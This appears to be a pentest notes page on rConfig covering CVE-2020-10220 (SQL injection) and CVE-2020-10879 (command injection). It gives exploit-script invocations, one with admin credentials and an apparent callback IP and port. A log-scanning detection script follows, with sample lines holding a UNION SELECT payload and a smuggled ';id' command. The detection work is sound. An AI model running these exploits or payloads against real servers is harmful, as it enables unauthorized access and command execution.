rConfig
rConfig is an open-source network configuration management tool primarily used for backing up and managing device configurations. It is commonly deployed in enterprise environments to automate configuration snapshots of routers, switches, and other network equipment. The application is PHP-based and relies on a MySQL backend, making it a frequent target for web application security assessments due to historically poor input sanitization and vulnerable database interactions.
SQLi
rConfig versions before 3.9.5 are vulnerable to a SQLi flaw (CVE-2020-10220) through the searchColumn parameter in commands.inc.php. This flaw enables unauthorized access to sensitive data or manipulation of the database. A working PoC is available.
$ python3 48208.py https://<target-IP>
Authenticated RCE
rConfig versions before 3.9.5 are also vulnerable to a command injection flaw (CVE-2020-10879) in lib/crud/search.crud.php. The nodeId parameter is passed directly to the exec function without proper sanitization, allowing an attacker to execute arbitrary commands on the server. A working PoC is also available.
$ python3 48241.py https://<target-IP> admin Pass123! 192.168.45.170 80
A PoC that combines both CVEs is available here.
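For detection, the added example below (not part of the original page or of rConfig) scans web server access logs for requests to the two scripts named above whose searchColumn or nodeId value falls outside an expected shape. It assumes combined-format logs, that the parameters arrive in the query string, that searchColumn is normally a bare column identifier and nodeId a numeric id; the log lines are constructed.

```python
import re
from urllib.parse import urlsplit, parse_qs

# script name -> (parameter, allowed value shape, CVE). The shapes are assumptions:
# searchColumn is treated as a bare column identifier, nodeId as a numeric id.
RULES = {
    "commands.inc.php": ("searchColumn", re.compile(r"[A-Za-z0-9_]*"), "CVE-2020-10220"),
    "search.crud.php": ("nodeId", re.compile(r"[0-9]*"), "CVE-2020-10879"),
}
# Client address and request target from a combined-format access log line.
LOG_RE = re.compile(r'^(\S+) .*?"(?:GET|POST) (\S+) HTTP/[0-9.]+"')

def scan(lines):
    """Return (client, cve, param, decoded_value) for values outside the allowed shape."""
    hits = []
    for line in lines:
        m = LOG_RE.match(line)
        if not m:
            continue
        client, target = m.groups()
        url = urlsplit(target)
        rule = RULES.get(url.path.rsplit("/", 1)[-1])
        if rule is None:
            continue
        param, allowed, cve = rule
        # parse_qs percent-decodes, so encoded metacharacters are seen in the clear.
        for value in parse_qs(url.query).get(param, []):
            if not allowed.fullmatch(value):
                hits.append((client, cve, param, value))
    return hits

# Constructed sample log lines (documentation address ranges, not real traffic).
SAMPLE = [
    '203.0.113.7 - - [01/Jan/2024:10:00:00 +0000] "GET /commands.inc.php?searchColumn=command HTTP/1.1" 200 512',
    '198.51.100.23 - - [01/Jan/2024:10:00:05 +0000] "GET /commands.inc.php?searchColumn=command%20UNION%20SELECT%201 HTTP/1.1" 200 640',
    '203.0.113.7 - - [01/Jan/2024:10:01:00 +0000] "GET /lib/crud/search.crud.php?nodeId=12 HTTP/1.1" 200 300',
    '198.51.100.23 - - [01/Jan/2024:10:01:09 +0000] "GET /lib/crud/search.crud.php?nodeId=12%3Bid HTTP/1.1" 200 310',
    '203.0.113.7 - - [01/Jan/2024:10:02:00 +0000] "GET /login.php HTTP/1.1" 200 900',
]

if __name__ == "__main__":
    for hit in scan(SAMPLE):
        print(*hit, sep="\t")
```

Parameters sent in a POST body do not appear in access logs, so that case needs the same shape check applied at a reverse proxy or WAF instead.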